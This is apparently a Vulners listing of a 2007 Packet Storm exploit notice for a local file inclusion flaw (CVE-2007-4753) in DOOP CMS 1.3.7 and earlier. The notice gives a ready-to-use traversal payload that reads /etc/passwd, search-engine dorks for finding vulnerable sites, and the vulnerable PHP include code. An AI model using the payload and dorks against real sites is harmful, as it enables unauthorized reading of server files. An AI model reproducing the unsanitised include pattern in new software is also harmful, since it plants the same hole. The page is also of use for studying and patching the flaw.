Lucene search
K

doopcms-sql.txt

🗓️ 15 Oct 2007 00:00:00Reported by VladiiiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

CVE-2007-4753 Local File Inclusion in DOOP CM

Code
` ______________________________________________________  
| DOOP CMS <=1.3.7 Local File Inclusion |  
|______________________________________________________|  
  
______________________________________________________  
| vuln path: ?page=/../../../../../../../etc/passwd%00 |  
| |  
| dork: Doop CMS |  
| dork2: powered by Doop CMS |  
| |   
| work only if magic_quotes_gpc are set to OFF |  
|______________________________________________________|  
  
______________________________________________________  
| vuln code: |  
| line 544: |  
| if (!isset($_REQUEST['page'])){ |  
| $_REQUEST['page']=$homepage; |  
| $cpage=$_REQUEST['page']; |  
| } else { $cpage=$_REQUEST['page']; } |  
| |  
| line 646: |  
| if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){  
| if (file_exists("pages/".$cpage.".htm")){ |  
| include("pages/".$cpage.".htm"); |  
| } |  
| else include("pages/".$cpage.".html"); |  
| } |  
|______________________________________________________|  
______________________________________________________  
| greetz to: http://vladii.wordpress.com |  
| http://rstzone.org |  
| http://hackpedia.info |  
| SlicK & Shocker & moubik & kw3 |  
|______________________________________________________|  
  
______________________________________________________  
| @vladii 2007 |  
|______________________________________________________|   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Oct 2007 00:00Current
7.4High risk
Vulners AI Score7.4
18